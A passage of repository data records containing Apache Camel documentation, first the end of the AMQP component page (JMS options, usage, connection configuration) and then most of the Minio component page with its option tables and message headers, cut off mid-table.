asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *headerFilterStrategy* (advanced) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *includeAllJMSXProperties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | String\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageListenerContainer Factory* (advanced) | Registry ID of the MessageListenerContainerFactory used to determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use to consume messages. Setting this will automatically set consumerType to Custom. | | MessageListener ContainerFactory\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *useMessageIDAsCorrelation ID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *waitForProvisionCorrelation ToBeUpdatedCounter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvisionCorrelation ToBeUpdatedThreadSleeping Time* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *errorHandlerLoggingLevel* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStackTrace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. | | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n|===\n\/\/ endpoint options: END\n\n\n\n\n### Usage\n\nAs AMQP component is inherited from JMS component, the usage of the\nformer is almost identical to the latter:\n\n*Using AMQP component*\n\n[source,java]\n------------------------------------\n\/\/ Consuming from AMQP queue\nfrom(\"amqp:queue:incoming\").\n to(...);\n\u00a0\n\/\/ Sending message to the AMQP topic\nfrom(...).\n to(\"amqp:topic:notify\");\n------------------------------------\n\n### Configuring AMQP component\n\nStarting from the Camel 2.16.1 you can also use the\n`AMQPComponent#amqp10Component(String connectionURI)` factory method to\nreturn the AMQP 1.0 component with the pre-configured\u00a0topic prefix:\u00a0\n\n*Creating AMQP 1.0 component*\n\n[source,java]\n-----------------------------------------------------------------------------------------\n AMQPComponent amqp = AMQPComponent.amqp10Component(\"amqp:\/\/guest:guest@localhost:5672\");\n-----------------------------------------------------------------------------------------\n\nKeep in mind that starting from the\nCamel\u00a02.17\u00a0the\u00a0`AMQPComponent#amqp10Component(String connectionURI)`\u00a0factory\nmethod has been deprecated on the behalf of the\n`AMQPComponent#amqpComponent(String connectionURI)`:\u00a0\n\n*Creating AMQP 1.0 component*\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672\");\n\u00a0\nAMQPComponent authorizedAmqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672\", \"user\", \"password\");\n--------------------------------------------------------------------------------------------------------\n\nStarting from Camel 2.17, in order to automatically configure the AMQP\ncomponent, you can also add an instance\nof\u00a0`org.apache.camel.component.amqp.AMQPConnectionDetails` to the\nregistry. For example for Spring Boot you just have to define\u00a0bean:\n\n*AMQP connection details auto-configuration*\n\n[source,java]\n-------------------------------------------------------------------------------------\n@Bean\nAMQPConnectionDetails amqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\"); \n}\n\u00a0\n@Bean\nAMQPConnectionDetails securedAmqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/lcoalhost:5672\", \"username\", \"password\"); \n}\n-------------------------------------------------------------------------------------\n\nLikewise, you can also use CDI producer methods when using Camel-CDI\n\n*AMQP connection details auto-configuration for CDI*\n\n[source,java]\n-------------------------------------------------------------------------------------\n@Produces\nAMQPConnectionDetails amqpConnection() {\n return new AMQPConnectionDetails(\"amqp:\/\/localhost:5672\");\n}\n-------------------------------------------------------------------------------------\n\nYou can also rely on the <<properties-component,Camel properties>> to read\nthe AMQP connection details. Factory\nmethod\u00a0`AMQPConnectionDetails.discoverAMQP()`\u00a0attempts to read Camel\nproperties in a Kubernetes-like convention, just as demonstrated on the\nsnippet below:\n\n*AMQP connection details auto-configuration*\n\n[source,java]\n-----------------------------------------------\nexport AMQP_SERVICE_HOST = \"mybroker.com\"\nexport AMQP_SERVICE_PORT = \"6666\"\nexport AMQP_SERVICE_USERNAME = \"username\"\nexport AMQP_SERVICE_PASSWORD = \"password\"\n\u00a0\n...\n\u00a0\n@Bean\nAMQPConnectionDetails amqpConnection() {\n return AMQPConnectionDetails.discoverAMQP(); \n}\n-----------------------------------------------\n\n*Enabling amqp specific options*\n\nIf you, for example, need to enable `amqp.traceFrames` you can do that by appending the option to your URI, like the following example:\n\n[source,java]\n--------------------------------------------------------------------------------------------------------\nAMQPComponent amqp = AMQPComponent.amqpComponent(\"amqp:\/\/localhost:5672?amqp.traceFrames=true\");\n--------------------------------------------------------------------------------------------------------\n\nFor reference take a look at the https:\/\/qpid.apache.org\/releases\/qpid-jms-0.29.0\/docs\/index.html[QPID JMS client configuration]\n\n### Using topics\n\nTo have using topics working with\u00a0`camel-amqp`\u00a0you need to configure the\ncomponent to use\u00a0`topic:\/\/`\u00a0as topic prefix, as shown below:\n\n[source,java]\n-------------------------------------------------------------------------------------------------------------------------------\n <bean id=\"amqp\" class=\"org.apache.camel.component.amqp.AmqpComponent\">\n <property name=\"connectionFactory\">\n <bean class=\"org.apache.qpid.jms.JmsConnectionFactory\" factory-method=\"createFromURL\">\n <property name=\"remoteURI\" value=\"amqp:\/\/localhost:5672\" \/>\n <property name=\"topicPrefix\" value=\"topic:\/\/\" \/> <!-- only necessary when connecting to ActiveMQ over AMQP 1.0 -->\n <\/bean>\n <\/property>\n <\/bean>\n-------------------------------------------------------------------------------------------------------------------------------\n\nKeep in mind that both\u00a0\u00a0`AMQPComponent#amqpComponent()`\u00a0methods and\n`AMQPConnectionDetails` pre-configure the component with the topic\nprefix, so you don't have to configure it explicitly.\n\n### See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98be1af5b1f764fd97a3179506a3d3dbbb4f35e0","subject":"Regen","message":"Regen\n","repos":"tadayosi\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,christophd\/camel,gnodet\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,apache\/camel,pax95\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,adessaigne\/camel,gnodet\/camel,apache\/camel,nikhilvibhav\/camel,pax95\/camel,gnodet\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel,apache\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,tdiesler\/camel,cunningt\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/minio-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/minio-component.adoc","new_contents":"[[minio-component]]\n= Minio Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-minio\/src\/main\/docs\/minio-component.adoc\n:docTitle: Minio\n:artifactId: camel-minio\n:description: Store and retrieve objects from Minio Storage Service using Minio SDK.\n:since: 3.5\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/minio.adoc[opts=optional]\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Minio component supports storing and retrieving objects from\/to\nhttps:\/\/min.io\/[Minio] service.\n\nPrerequisites\n\nYou must have valid credentials for authorized access to the buckets\/folders. More information is available at\nhttps:\/\/min.io\/[Minio].\n\n== URI Format\n\n[source,java]\n------------------------------\nminio:\/\/bucketName[?options]\n------------------------------\n\nThe bucket will be created if it doesn't already exist. +\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\nFor example in order to read file `hello.txt` from the bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n== URI Options\n\n\/\/ component options: START\nThe Minio component supports 47 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if bucket name not exist. | true | boolean\n| *configuration* (common) | The component configuration | | MinioConfiguration\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | Endpoint can be an URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating new bucket. | false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id() | | String\n| *secure* (common) | Flag to indicate to use secure connection to minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for source object while copy\/move objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypassGovernanceMode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Source bucket name. | | String\n| *destinationObjectName* (consumer) | Source object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to autocloseBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user meta data. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. | false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List recursively than directory structure emulation. | false | boolean\n| *startAfter* (consumer) | list objects in bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set un modified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | when true, version 1 of REST API is used. | false | boolean\n| *versionId* (consumer) | Set specific version_ID of a object when deleting the object. | | String\n| *deleteAfterWrite* (producer) | Delete file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. | true | boolean\n| *accessKey* (security) | Amazon AWS Secret Access Key or Minio Access Key. If not set camel will connect to service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Access Key Id or Minio Secret Key. If not set camel will connect to service for anonymous access. | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Minio endpoint is configured using URI syntax:\n\n----\nminio:bucketName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketName* | *Required* Bucket name | | String\n|===\n\n\n=== Query Parameters (64 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if bucket name not exist. | true | boolean\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | Endpoint can be an URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating new bucket. | false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id() | | String\n| *secure* (common) | Flag to indicate to use secure connection to minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for source object while copy\/move objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypassGovernanceMode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Source bucket name. | | String\n| *destinationObjectName* (consumer) | Source object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to autocloseBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user meta data. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. | false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List recursively than directory structure emulation. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *startAfter* (consumer) | list objects in bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set un modified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | when true, version 1 of REST API is used. | false | boolean\n| *versionId* (consumer) | Set specific version_ID of a object when deleting the object. | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *deleteAfterWrite* (producer) | Delete file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component. Use value spring or quartz for built in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Secret Access Key or Minio Access Key. If not set camel will connect to service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Access Key Id or Minio Secret Key. If not set camel will connect to service for anonymous access. | | String\n|===\n\/\/ endpoint options: END\n\nRequired Minio component options\n\nYou have to provide the minioClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/min.io\/[Minio].\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you for instance to know how many messages exists in this\nbatch and for instance let the Aggregator\naggregate this number of messages.\n\n== Usage\n\n=== Message headers evaluated by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\"]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioBucketName` |`String` |The bucket Name which this object will be stored or which will be used for the current operation\n\n|`CamelMinioDestinationBucketName` |`String` |The bucket Destination Name which will be used for the current operation\n\n|`CamelMinioContentLength` |`Long` |The content length of this object.\n\n|`CamelMinioContentType` |`String` |The content type of this object.\n\n|`CamelMinioContentControl` |`String` |The content control of this object.\n\n|`CamelMinioContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelMinioContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelMinioContentMD5` |`String` |The md5 checksum of this object.\n\n|`CamelMinioDestinationObjectName` |`String` |The Destination key which will be used for the current operation\n\n|`CamelMinioObjectName` |`String` |The key under which this object will be stored or which will be used for the current operation\n\n|`CamelMinioLastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelMinioOperation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, deleteObjects, listBuckets, deleteBucket, downloadLink, 